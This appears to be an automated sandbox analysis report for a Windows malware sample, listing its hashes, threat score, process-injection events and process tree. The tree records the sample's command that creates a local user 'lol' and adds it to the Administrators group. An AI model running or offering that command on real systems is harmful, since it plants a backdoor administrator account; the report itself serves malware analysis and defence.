Analysis
max time kernel: 139s
max time network: 155s
platform: windows10-2004_x64
resource: win10v2004-20220414-en
submitted: 08-06-2022 04:21
Static task: static1
Behavioral task: behavioral1
Sample: 1a1a1f95234d0cdd46d9265c7c9e0c6fa2836aecf98608eac0d2c6e1247e4ba8.exe
Resource: win7-20220414-en, windows7_x64
0 signatures, 0 seconds
Behavioral task: behavioral2
Sample: 1a1a1f95234d0cdd46d9265c7c9e0c6fa2836aecf98608eac0d2c6e1247e4ba8.exe
Resource: win10v2004-20220414-en, windows10-2004_x64
0 signatures, 0 seconds
General
Target: 1a1a1f95234d0cdd46d9265c7c9e0c6fa2836aecf98608eac0d2c6e1247e4ba8.exe
Size: 72KB
MD5: 1f299506e50a82c1111969d4bf76e7ea
SHA1: 9758832ef27dc5b099417f505da7060dd9f7695e
SHA256: 1a1a1f95234d0cdd46d9265c7c9e0c6fa2836aecf98608eac0d2c6e1247e4ba8
SHA512: a960f7751d479101ce4d64ac0bbdde1700c7cbeacdd9a6c6f15faaef959a582934cc6053ef2d4fab2c408581a3a477dab02c38d191682b9ca9f894058dd49673
Score: 9/10
Malware Config
Signatures
Grants admin privileges (1 TTPs): Uses net.exe to modify the user's privileges.
Runs net.exe
Suspicious use of WriteProcessMemory (15 IoCs)
Processes: 1a1a1f95234d0cdd46d9265c7c9e0c6fa2836aecf98608eac0d2c6e1247e4ba8.exe, cmd.exe, net.exe, net.exe
description | pid | process | target process
PID 3804 wrote to memory of 1404 | 3804 | 1a1a1f95234d0cdd46d9265c7c9e0c6fa2836aecf98608eac0d2c6e1247e4ba8.exe | cmd.exe
PID 3804 wrote to memory of 1404 | 3804 | 1a1a1f95234d0cdd46d9265c7c9e0c6fa2836aecf98608eac0d2c6e1247e4ba8.exe | cmd.exe
PID 3804 wrote to memory of 1404 | 3804 | 1a1a1f95234d0cdd46d9265c7c9e0c6fa2836aecf98608eac0d2c6e1247e4ba8.exe | cmd.exe
PID 1404 wrote to memory of 796 | 1404 | cmd.exe | net.exe
PID 1404 wrote to memory of 796 | 1404 | cmd.exe | net.exe
PID 1404 wrote to memory of 796 | 1404 | cmd.exe | net.exe
PID 796 wrote to memory of 2824 | 796 | net.exe | net1.exe
PID 796 wrote to memory of 2824 | 796 | net.exe | net1.exe
PID 796 wrote to memory of 2824 | 796 | net.exe | net1.exe
PID 1404 wrote to memory of 1044 | 1404 | cmd.exe | net.exe
PID 1404 wrote to memory of 1044 | 1404 | cmd.exe | net.exe
PID 1404 wrote to memory of 1044 | 1404 | cmd.exe | net.exe
PID 1044 wrote to memory of 2104 | 1044 | net.exe | net1.exe
PID 1044 wrote to memory of 2104 | 1044 | net.exe | net1.exe
PID 1044 wrote to memory of 2104 | 1044 | net.exe | net1.exe
Processes (indentation shows parent/child depth)
C:\Users\Admin\AppData\Local\Temp\1a1a1f95234d0cdd46d9265c7c9e0c6fa2836aecf98608eac0d2c6e1247e4ba8.exe
command line: "C:\Users\Admin\AppData\Local\Temp\1a1a1f95234d0cdd46d9265c7c9e0c6fa2836aecf98608eac0d2c6e1247e4ba8.exe"
- Suspicious use of WriteProcessMemory
  C:\Windows\SysWOW64\cmd.exe
  command line: cmd.exe /c net user lol j /ADD && net localgroup Administrators lol /ADD
  - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\net.exe
    command line: net user lol j /ADD
    - Suspicious use of WriteProcessMemory
      C:\Windows\SysWOW64\net1.exe
      command line: C:\Windows\system32\net1 user lol j /ADD
    C:\Windows\SysWOW64\net.exe
    command line: net localgroup Administrators lol /ADD
    - Suspicious use of WriteProcessMemory
      C:\Windows\SysWOW64\net1.exe
      command line: C:\Windows\system32\net1 localgroup Administrators lol /ADD